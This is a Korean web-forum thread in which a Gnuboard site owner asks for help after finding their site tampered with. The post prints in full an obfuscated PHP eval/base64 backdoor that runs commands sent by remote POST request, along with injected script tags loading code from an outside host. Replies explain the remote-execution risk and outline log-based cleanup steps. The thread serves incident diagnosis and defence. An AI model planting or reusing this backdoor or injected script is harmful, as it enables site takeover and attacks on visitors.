페이지가 변조 되었네요 정보
페이지가 변조 되었네요본문
index.php ,config.php,dbconfig.php 파일 상단에
<?php eval(base64_decode('aWYoIWlzc2V0KCR2b3M4MSkpe2Z1bmN0aW9uIHZvczgoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyOXRiMk5vWVdOb1lTNWpiMjB2YVcxaFoyVnpMM0poYm1zMUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB2b3M4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR2b3M4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkdm9zODEpKWNhbGxfdXNlcl9mdW5jKCR2b3M4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2b3M4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3ZvczgnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdm9zOGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3ZvczgyJykpIT0ndm9zODInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
그리고 모든 js파일 하단에
document.write('<script src=http://omochacha.com/images/rank5.php ><\/script>');
그리고 모든 HTML 파일엔
<script src=http://omochacha.com/images/rank5.php ></script>
내용이 들어가 있는데요.
제 사이트만 이러는 건가요?
마땅히 검색어를 뭘로 해야할지도 모르겠네요.
위 문제를 해결할 방법이 있을까요?
그누 버전에 상관없이 저러는거 같은데요.
<?php eval(base64_decode('aWYoIWlzc2V0KCR2b3M4MSkpe2Z1bmN0aW9uIHZvczgoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyOXRiMk5vWVdOb1lTNWpiMjB2YVcxaFoyVnpMM0poYm1zMUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB2b3M4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR2b3M4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkdm9zODEpKWNhbGxfdXNlcl9mdW5jKCR2b3M4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2b3M4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3ZvczgnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdm9zOGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3ZvczgyJykpIT0ndm9zODInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
그리고 모든 js파일 하단에
document.write('<script src=http://omochacha.com/images/rank5.php ><\/script>');
그리고 모든 HTML 파일엔
<script src=http://omochacha.com/images/rank5.php ></script>
내용이 들어가 있는데요.
제 사이트만 이러는 건가요?
마땅히 검색어를 뭘로 해야할지도 모르겠네요.
위 문제를 해결할 방법이 있을까요?
그누 버전에 상관없이 저러는거 같은데요.
댓글 전체
답변 감사합니다.
위 글의 내용대로라면 사용자의 PC가 문제네요.
그렇다면 뭐 어찌할 방법이 없는...
위 글의 내용대로라면 사용자의 PC가 문제네요.
그렇다면 뭐 어찌할 방법이 없는...
음. 심각한 상황이군요.. 내용을 분석해본결과..
소스에 eval(base64_decode($_POST['e'])) 부분이 포함되어 있어서 언제든지 원격에서 php 소스를 실행할수있는 상태입니다.
1. 해당 파일의 변경날짜를 기준으로 apache 로그 파일을 분석해서 IP를 추적하고
2. 해당 IP가 한 모든 기록을 저장한다음.
3. 어느 파일을 실행했는지 알아내고,
4, 해당파일을 다른곳으로 백업을 하고 그 파일은 삭제한뒤
5. 그 파일이 침투된 경로를 찾아서 그 부분을 막아야합니다. php.ini 등 수정..
전문가의 조언을 받기를 추전합니다.
급한대로 해당부분은 다삭제하세요..
소스에 eval(base64_decode($_POST['e'])) 부분이 포함되어 있어서 언제든지 원격에서 php 소스를 실행할수있는 상태입니다.
1. 해당 파일의 변경날짜를 기준으로 apache 로그 파일을 분석해서 IP를 추적하고
2. 해당 IP가 한 모든 기록을 저장한다음.
3. 어느 파일을 실행했는지 알아내고,
4, 해당파일을 다른곳으로 백업을 하고 그 파일은 삭제한뒤
5. 그 파일이 침투된 경로를 찾아서 그 부분을 막아야합니다. php.ini 등 수정..
전문가의 조언을 받기를 추전합니다.
급한대로 해당부분은 다삭제하세요..
답변 감사합니다.
일단 해당내용을 지우고 있습니다.
웹호스팅 받고 있는데 분석을 어떻게 해야할지도 고민이네요..
일단 해당내용을 지우고 있습니다.
웹호스팅 받고 있는데 분석을 어떻게 해야할지도 고민이네요..
그날짜 이후 아파치 로그 파일을 보내달라고 해서 저에게 보내봐 주세요.
한번 살펴봐드릴께요.^^
한번 살펴봐드릴께요.^^
감사합니다.
일단 로그파일 요청해두었습니다.
일단 로그파일 요청해두었습니다.
